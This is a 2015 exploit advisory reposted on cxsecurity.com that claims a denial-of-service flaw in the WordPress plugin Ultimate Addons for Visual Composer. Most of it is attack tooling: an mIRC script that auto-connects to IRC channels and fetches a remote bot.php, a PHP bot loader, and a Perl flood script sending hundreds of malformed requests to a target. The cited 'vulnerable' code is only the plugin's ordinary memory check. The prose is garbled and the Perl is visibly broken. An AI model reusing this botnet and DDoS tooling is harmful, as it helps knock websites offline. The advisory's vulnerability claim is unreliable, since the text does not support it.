Wordpress Crash Ultimate Addons for Visual Composer vulnerability

Published
Credit
Risk
2015.09.10
Ashiyane Digital Security Team
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

/************************************************************************************************
[+] Exploit Title : Wordpress Crash Ultimate Addons for Visual Composer vulnerability

[+] Exploit Author : Ashiyane Digital Security Team

[+] Tested on : Windows - Firefox

[+] Vendor Homepage : http://codecanyon.net/item/ultimate-addons-for-visual-composer/6892199

[+] Version: 3.12.0
*************************************************************************************************/

----------------------------------------
- vulnerability Ultimate_VC_Addons.php -
----------------------------------------

This Part visitors increased the pressure on the core WordPress,It is a denial of the exercise of visits

However, we try to write 0day to the target affect scenarios

Example : https://www.exploit-db.com/wp-content/plugins/Ultimate_VC_Addons/README

Our present method by transferring the channel expansion as we botnet

this is the syntax mSL that you have to your script connect to other networks.

--->

{
update_option('ultimate_vc_addons_redirect',true);
$memory = ini_get('memory_limit');
$allowed_memory = preg_replace("/[^0-9]/","",$memory)*1024*1024;
$peak_memory = memory_get_peak_usage(true);
if($allowed_memory - $peak_memory <= 14436352){
$pre = __(&#039;Unfortunately, plugin could not be activated. Not enough memory available.&#039;,&#039;ultimate_vc&#039;);
$sub = __(&#039;Please contact&#039;, &#039;ultimate_vc&#039;);
trigger_error( $pre.&#039; &#039;.$sub.&#039; <a href="https://www.brainstormforce.com/support/">&#039;.__(&#039;plugin support&#039;,
&#039;ultimate_vc&#039;).&#039;</a>.&#039;,E_USER_ERROR );
}

<---

---------------------------------------

=====================
= mSL Auto Connect: =
=====================


on *:Connect: {
/url -an www.exmple.com/bot.php
}

on *:START:{

server irc.network.com -i <nick> -j #channel,#channel
server irc.network.com -i <nick> -j #channel,#channel

}

=====================
= PHP Bot =
=====================

<?php
error_reporting(0);
$file1 = &#039;DDoS.pl&#039;;
$file_headers = @get_headers($file1);
if($file_headers[0] == &#039;HTTP/1.1 404 Not Found&#039;) {
break;

}else {
$s=file_get_contents($file1);
echo $s;
}
?>

=====================
= DDoS Perl =
=====================

#!/usr/bin/perl
#
# Title : allowed memory size exhausted
# Author : Ashiyane Digital Security Team
# Improvment Code : Und3rgr0und

use IO::Socket;

$ip="127.0.0.1";
$port="80";
$counter =0;


@attackpattern=("&#039;");
for ($x=0;$x<=600;$x++){
$headerLine="GET /Ultimate_VC_Addons/ HTTP/1.0nn";
@temp=split(/(/)/,$headerLine);
foreach (@temp){
$replaceme=$_;
foreach(@attackpattern){
$attack=$_;
$newheaderline=$headerLine;
$newheaderline=~ s/$replaceme/$attack/i;
$remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection impossiblen";
print $remote $newheaderline;
print "nRequest: ".$counter++." t".$newheaderline."n";
$remote->close;
}
}
}

---------------------------------------

Discoverd BY : Und3rgr0und


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com